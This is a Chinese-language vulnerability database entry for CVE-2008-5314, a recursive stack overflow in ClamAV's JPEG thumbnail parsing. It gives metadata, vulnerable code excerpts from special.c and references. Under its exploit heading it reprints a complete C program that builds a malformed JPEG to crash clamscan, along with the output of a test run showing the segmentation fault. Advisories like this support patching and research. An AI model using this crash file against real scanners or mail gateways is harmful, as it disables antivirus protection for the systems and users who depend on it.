ClamAV cli_check_jpeg_exploit函数畸形JPEG文件拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116923 漏洞类型 资源管理错误
发布时间 2008-12-03 更新时间 2009-02-13
CVE编号 CVE-2008-5314 CNNVD-ID CNNVD-200812-034
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/7330
https://www.securityfocus.com/bid/32555
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-034
|漏洞详情
ClamAntiVirus是Unix的GPL杀毒工具包,很多邮件网关产品都在使用。ClamAV的jpeg解析代码中存在递归栈溢出漏洞。如果用户扫描到了恶意的jpeg文件或文件缩略图,就会在没有检查递归限制的情况下调用有漏洞的cli_check_jpeg_exploit函数,触发栈溢出。以下是clamav-0.94\libclamav\special.c文件中的有漏洞代码段:intcli_check_jpeg_exploit(intfd)<--fdtojpegfile{...if((retval=jpeg_check_photoshop(fd))!=0){returnretval;}...}...staticintjpeg_check_photoshop(intfd){...retval=jpeg_check_photoshop_8bim(fd);...}...staticintjpeg_check_photoshop_8bim(intfd){...retval=cli_check_jpeg_exploit(fd);<--callscli_check_jpeg_exploit()againwithoutanyrecursivechecks!...}
|漏洞EXP
/*
There is a recursive stack overflow in clamav 0.93.3 and 0.94 (and probably
older versions) in the jpeg parsing code.
it scan's the jpeg file, and if there is a thumbnail, it'll scan that too. the
thumbnail itself is just another jpeg 
file and the same jpeg scanning function gets called without checking any kind
of recurising limit. this can easely 
lead to a recurisive stack overflow. the vulnerable code looks like: 
clamav-0.94\libclamav\special.c
int cli_check_jpeg_exploit(int fd) <-- fd to jpeg file
{
...
                        if ((retval=jpeg_check_photoshop(fd)) != 0) {
                                return retval;
                        }
...
}
...
static int jpeg_check_photoshop(int fd)
{
...
                retval = jpeg_check_photoshop_8bim(fd);
...
}
...
static int jpeg_check_photoshop_8bim(int fd)
{
...
        retval = cli_check_jpeg_exploit(fd); <-- calls cli_check_jpeg_exploit()
again without any recursive checks !
...
}

the exploit shown below triggers this recursive stack overflow by creating a
fake jpg file. once created and passed on 
to clamav it'll go in a recursive stack loop untill clamav runs out of stack
memory and causes a stack overflow. effectively 
crashing clamav. The exploit was tested on clamav 0.94 on opensolaris running
in a vmware.
exploit:
*/

const char crashstr[] = "\xff\xd8" // jpg marker 
                        "\xff\xed" // exif data 
                        "\x00\x02" // length 
                        "Photoshop 3.0\x00"
                        "8BIM"
                        "\x04\x0c" // thumbnail id  
                        "\x00" 
                        "\x01"
                        "\x01\x01\x01\x01"
                        "0123456789012345678912345678"; // skip over 28 bytes 

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

#define NR_ITER 200000

int main() {
        FILE *fp;
        int i;
        fp = fopen("clamav-jpeg-crash.jpg", "w+");
        if (!fp) {
                printf("can't open/create file\n");
                exit(0);
        }
        for (i = 0; i < NR_ITER; i++) {
                fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
fp);
        }
        fclose(fp);
        printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
        exit(0);
}

/*
result: 
ilja@opensolaris:~$ ./jpg
done, now run clamscan on ./clamav-jpeg-crash.jpg
ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg 
LibClamAV Warning: **************************************************
LibClamAV Warning: ***  The virus database is older than 7 days!  ***
LibClamAV Warning: ***   Please update it as soon as possible.    ***
LibClamAV Warning: **************************************************
Segmentation Fault <-- clamav crashed !
ilja@opensolaris:~$
*/

// milw0rm.com [2008-12-03]
|受影响的产品
Ubuntu Ubuntu Linux 8.10 sparc Ubuntu Ubuntu Linux 8.10 powerpc Ubuntu Ubuntu Linux 8.10 lpia Ubuntu Ubuntu Linux 8.10 i386 Ubuntu Ubuntu Linux 8.10 amd64 SuSE SUSE Linux
|参考资料

来源:wwws.clamav.net
链接:https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266
来源:XF
名称:clamav-special-dos(46985)
链接:http://xforce.iss.net/xforce/xfdb/46985
来源:UBUNTU
名称:USN-684-1
链接:http://www.ubuntu.com/usn/usn-684-1
来源:SECTRACK
名称:1021296
链接:http://www.securitytracker.com/id?1021296
来源:BID
名称:32555
链接:http://www.securityfocus.com/bid/32555
来源:MLIST
名称:[oss-security]20081201CVErequest:clamav0.94.2
链接:http://www.openwall.com/lists/oss-security/2008/12/01/8
来源:MILW0RM
名称:7330
链接:http://www.milw0rm.com/exploits/7330
来源:MANDRIVA
名称:MDVSA-2008:239
链接:http://www.mandriva.com/security/advisories?name=MDVSA-2008:239
来源:VUPEN
名称:ADV-2009-0422
链接:http://www.frsirt.com/english/advisories/2009/0422
来源:VUPEN
名称:ADV-2008-3311
链接:http://www.frsirt.com/english/advisories/2008/3311
来源:DEBIAN
名称:DSA-1680
链接:http://www.debian.org/security/2008/dsa-1680
来源:support.apple.com
链接:http://support.apple.com/kb/HT3438
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=64